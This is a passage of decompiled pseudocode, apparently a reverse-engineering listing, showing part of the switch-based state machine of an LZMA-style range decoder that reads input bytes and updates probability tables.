                                            											__edx = 0;
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) = 1;
                                            												 *(__ebp - 0x84) = 7;
                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            												while(1) {
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											}
                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            											__esi =  *(__ebp - 0x60);
                                            											__cl = 8;
                                            											__cl = 8 -  *(__ebp - 0x3c);
                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            											__ecx =  *(__ebp - 0x3c);
                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            											__ecx =  *(__ebp - 4);
                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            											__eflags =  *(__ebp - 0x38) - 4;
                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											if( *(__ebp - 0x38) >= 4) {
                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                            												if( *(__ebp - 0x38) >= 0xa) {
                                            													_t98 = __ebp - 0x38;
                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                            													__eflags =  *_t98;
                                            												} else {
                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            												}
                                            											} else {
                                            												 *(__ebp - 0x38) = 0;
                                            											}
                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                            											if( *(__ebp - 0x34) == __edx) {
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												goto L61;
                                            											} else {
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__ecx =  *(__ebp - 8);
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            												goto L41;
                                            											}
                                            										case 7:
                                            											__eflags =  *(__ebp - 0x40) - 1;
                                            											if( *(__ebp - 0x40) != 1) {
                                            												__eax =  *(__ebp - 0x24);
                                            												 *(__ebp - 0x80) = 0x16;
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												__eax =  *(__ebp - 0x2c);
                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            												__eax =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 4) + 0x664;
                                            												__eflags = __eax;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L69;
                                            											}
                                            											__eax =  *(__ebp - 4);
                                            											__ecx =  *(__ebp - 0x38);
                                            											 *(__ebp - 0x84) = 8;
                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            											while(1) {
                                            												 *(_t613 - 0x54) = _t606;
                                            												goto L133;
                                            											}
                                            										case 8:
                                            											goto L0;
                                            										case 9:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												goto L89;
                                            											}
                                            											__eflags =  *(__ebp - 0x60);
                                            											if( *(__ebp - 0x60) == 0) {
                                            												goto L171;
                                            											}
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                            											__eflags = _t258;
                                            											0 | _t258 = _t258 + _t258 + 9;
                                            											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                            											goto L75;
                                            										case 0xa:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xb;
                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            												while(1) {
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											}
                                            											__eax =  *(__ebp - 0x28);
                                            											goto L88;
                                            										case 0xb:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__ecx =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x20);
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            											} else {
                                            												__eax =  *(__ebp - 0x24);
                                            											}
                                            											__ecx =  *(__ebp - 0x28);
                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            											L88:
                                            											__ecx =  *(__ebp - 0x2c);
                                            											 *(__ebp - 0x2c) = __eax;
                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            											L89:
                                            											__eax =  *(__ebp - 4);
                                            											 *(__ebp - 0x80) = 0x15;
                                            											__eax =  *(__ebp - 4) + 0xa68;
                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            											goto L69;
                                            										case 0xc:
                                            											L99:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xc;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t334 = __ebp - 0x70;
                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t334;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											__eax =  *(__ebp - 0x2c);
                                            											goto L101;
                                            										case 0xd:
                                            											L37:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xd;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t122 = __ebp - 0x70;
                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t122;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L39:
                                            											__eax =  *(__ebp - 0x40);
                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            												goto L48;
                                            											}
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												goto L54;
                                            											}
                                            											L41:
                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            											 *(__ebp - 0x48) = __eax;
                                            											__eax = __eax + 1;
                                            											__eax = __eax << 8;
                                            											__eax = __eax + __ebx;
                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edx = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												 *(__ebp - 0x40) = 1;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												__ebx = __ebx + __ebx + 1;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edx;
                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L39;
                                            											} else {
                                            												goto L37;
                                            											}
                                            										case 0xe:
                                            											L46:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xe;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t156 = __ebp - 0x70;
                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t156;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											while(1) {
                                            												L48:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													break;
                                            												}
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t170 = __edx + 1; // 0x1
                                            													__ebx = _t170;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													continue;
                                            												} else {
                                            													goto L46;
                                            												}
                                            											}
                                            											L54:
                                            											_t173 = __ebp - 0x34;
                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            											__eflags =  *_t173;
                                            											goto L55;
                                            										case 0xf:
                                            											L58:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xf;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t203 = __ebp - 0x70;
                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t203;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L60:
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												L55:
                                            												__al =  *(__ebp - 0x44);
                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            												goto L56;
                                            											}
                                            											L61:
                                            											__eax =  *(__ebp - 0x58);
                                            											__edx = __ebx + __ebx;
                                            											__ecx =  *(__ebp - 0x10);
                                            											__esi = __edx + __eax;
                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edi = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												_t217 = __edx + 1; // 0x1
                                            												__ebx = _t217;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edi;
                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L60;
                                            											} else {
                                            												goto L58;
                                            											}
                                            										case 0x10:
                                            											L109:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0x10;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t365 = __ebp - 0x70;
                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t365;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											goto L111;
                                            										case 0x11:
                                            											L69:
                                            											__esi =  *(__ebp - 0x58);
                                            											 *(__ebp - 0x84) = 0x12;
                                            											while(1) {
                                            												 *(_t613 - 0x54) = _t606;
                                            												goto L133;
                                            											}
                                            										case 0x12:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 0x58);
                                            												 *(__ebp - 0x84) = 0x13;
                                            												__esi =  *(__ebp - 0x58) + 2;
                                            												while(1) {
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											}
                                            											__eax =  *(__ebp - 0x4c);
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											__eflags = __eax;
                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                            											goto L130;
                                            										case 0x13:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												_t469 = __ebp - 0x58;
                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            												__eflags =  *_t469;
                                            												 *(__ebp - 0x30) = 0x10;
                                            												 *(__ebp - 0x40) = 8;
                                            												L144:
                                            												 *(__ebp - 0x7c) = 0x14;
                                            												goto L145;
                                            											}
                                            											__eax =  *(__ebp - 0x4c);
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											 *(__ebp - 0x30) = 8;
                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            											L130:
                                            											 *(__ebp - 0x58) = __eax;
                                            											 *(__ebp - 0x40) = 3;
                                            											goto L144;
                                            										case 0x14:
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            											__eax =  *(__ebp - 0x80);
                                            											 *(_t613 - 0x88) = _t533;
                                            											goto L1;
                                            										case 0x15:
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            											__al = __al & 0x000000fd;
                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            											goto L120;
                                            										case 0x16:
                                            											__eax =  *(__ebp - 0x30);
                                            											__eflags = __eax - 4;
                                            											if(__eax >= 4) {
                                            												_push(3);
                                            												_pop(__eax);
                                            											}
                                            											__ecx =  *(__ebp - 4);
                                            											 *(__ebp - 0x40) = 6;
                                            											__eax = __eax << 7;
                                            											 *(__ebp - 0x7c) = 0x19;
                                            											 *(__ebp - 0x58) = __eax;
                                            											goto L145;
                                            										case 0x17:
                                            											L145:
                                            											__eax =  *(__ebp - 0x40);
                                            											 *(__ebp - 0x50) = 1;
                                            											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            											goto L149;
                                            										case 0x18:
                                            											L146:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0x18;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t484 = __ebp - 0x70;
                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t484;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L148:
                                            											_t487 = __ebp - 0x48;
                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                            											__eflags =  *_t487;
                                            											L149:
                                            											__eflags =  *(__ebp - 0x48);
                                            											if( *(__ebp - 0x48) <= 0) {
                                            												__ecx =  *(__ebp - 0x40);
                                            												__ebx =  *(__ebp - 0x50);
                                            												0 = 1;
                                            												__eax = 1 << __cl;
                                            												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            												__eax =  *(__ebp - 0x7c);
                                            												 *(__ebp - 0x44) = __ebx;
                                            												while(1) {
                                            													 *(_t613 - 0x88) = _t533;
                                            													goto L1;
                                            												}
                                            											}
                                            											__eax =  *(__ebp - 0x50);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            											__eax =  *(__ebp - 0x58);
                                            											__esi = __edx + __eax;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__ax =  *__esi;
                                            											__edi = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												__cx = __ax >> 5;
                                            												__eax = __eax - __ecx;
                                            												__edx = __edx + 1;
                                            												__eflags = __edx;
                                            												 *__esi = __ax;
                                            												 *(__ebp - 0x50) = __edx;
                                            											} else {
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edi;
                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L148;
                                            											} else {
                                            												goto L146;
                                            											}
                                            										case 0x19:
                                            											__eflags = __ebx - 4;
                                            											if(__ebx < 4) {
                                            												 *(__ebp - 0x2c) = __ebx;
                                            												L119:
                                            												_t393 = __ebp - 0x2c;
                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                            												__eflags =  *_t393;
                                            												L120:
                                            												__eax =  *(__ebp - 0x2c);
                                            												__eflags = __eax;
                                            												if(__eax == 0) {
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            													goto L170;
                                            												}
                                            												__eflags = __eax -  *(__ebp - 0x60);
                                            												if(__eax >  *(__ebp - 0x60)) {
                                            													goto L171;
                                            												}
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            												__eax =  *(__ebp - 0x30);
                                            												_t400 = __ebp - 0x60;
                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            												__eflags =  *_t400;
                                            												goto L123;
                                            											}
                                            											__ecx = __ebx;
                                            											__eax = __ebx;
                                            											__ecx = __ebx >> 1;
                                            											__eax = __ebx & 0x00000001;
                                            											__ecx = (__ebx >> 1) - 1;
                                            											__al = __al | 0x00000002;
                                            											__eax = (__ebx & 0x00000001) << __cl;
                                            											__eflags = __ebx - 0xe;
                                            											 *(__ebp - 0x2c) = __eax;
                                            											if(__ebx >= 0xe) {
                                            												__ebx = 0;
                                            												 *(__ebp - 0x48) = __ecx;
                                            												L102:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													__eax = __eax + __ebx;
                                            													 *(__ebp - 0x40) = 4;
                                            													 *(__ebp - 0x2c) = __eax;
                                            													__eax =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 4) + 0x644;
                                            													__eflags = __eax;
                                            													L108:
                                            													__ebx = 0;
                                            													 *(__ebp - 0x58) = __eax;
                                            													 *(__ebp - 0x50) = 1;
                                            													 *(__ebp - 0x44) = 0;
                                            													 *(__ebp - 0x48) = 0;
                                            													L112:
                                            													__eax =  *(__ebp - 0x40);
                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            														_t391 = __ebp - 0x2c;
                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            														__eflags =  *_t391;
                                            														goto L119;
                                            													}
                                            													__eax =  *(__ebp - 0x50);
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            													__eax =  *(__ebp - 0x58);
                                            													__esi = __edi + __eax;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__ax =  *__esi;
                                            													__ecx = __ax & 0x0000ffff;
                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                            													if( *(__ebp - 0xc) >= __edx) {
                                            														__ecx = 0;
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            														__ecx = 1;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            														__ebx = 1;
                                            														__ecx =  *(__ebp - 0x48);
                                            														__ebx = 1 << __cl;
                                            														__ecx = 1 << __cl;
                                            														__ebx =  *(__ebp - 0x44);
                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                            														__cx = __ax;
                                            														__cx = __ax >> 5;
                                            														__eax = __eax - __ecx;
                                            														__edi = __edi + 1;
                                            														__eflags = __edi;
                                            														 *(__ebp - 0x44) = __ebx;
                                            														 *__esi = __ax;
                                            														 *(__ebp - 0x50) = __edi;
                                            													} else {
                                            														 *(__ebp - 0x10) = __edx;
                                            														0x800 = 0x800 - __ecx;
                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            														 *__esi = __dx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L111:
                                            														_t368 = __ebp - 0x48;
                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                            														__eflags =  *_t368;
                                            														goto L112;
                                            													} else {
                                            														goto L109;
                                            													}
                                            												}
                                            												__ecx =  *(__ebp - 0xc);
                                            												__ebx = __ebx + __ebx;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            													__ecx =  *(__ebp - 0x10);
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													__ebx = __ebx | 0x00000001;
                                            													__eflags = __ebx;
                                            													 *(__ebp - 0x44) = __ebx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													L101:
                                            													_t338 = __ebp - 0x48;
                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                            													__eflags =  *_t338;
                                            													goto L102;
                                            												} else {
                                            													goto L99;
                                            												}
                                            											}
                                            											__edx =  *(__ebp - 4);
                                            											__eax = __eax - __ebx;
                                            											 *(__ebp - 0x40) = __ecx;
                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            											goto L108;
                                            										case 0x1a:
                                            											L56:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												 *(__ebp - 0x88) = 0x1a;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x68);
                                            											__al =  *(__ebp - 0x5c);
                                            											__edx =  *(__ebp - 8);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            											 *( *(__ebp - 0x68)) = __al;
                                            											__ecx =  *(__ebp - 0x14);
                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                            											__eax = __ecx + 1;
                                            											__edx = 0;
                                            											_t192 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t192;
                                            											goto L79;
                                            										case 0x1b:
                                            											L75:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												 *(__ebp - 0x88) = 0x1b;
                                            												goto L170;
                                            											}
                                            											__eax =  *(__ebp - 0x14);
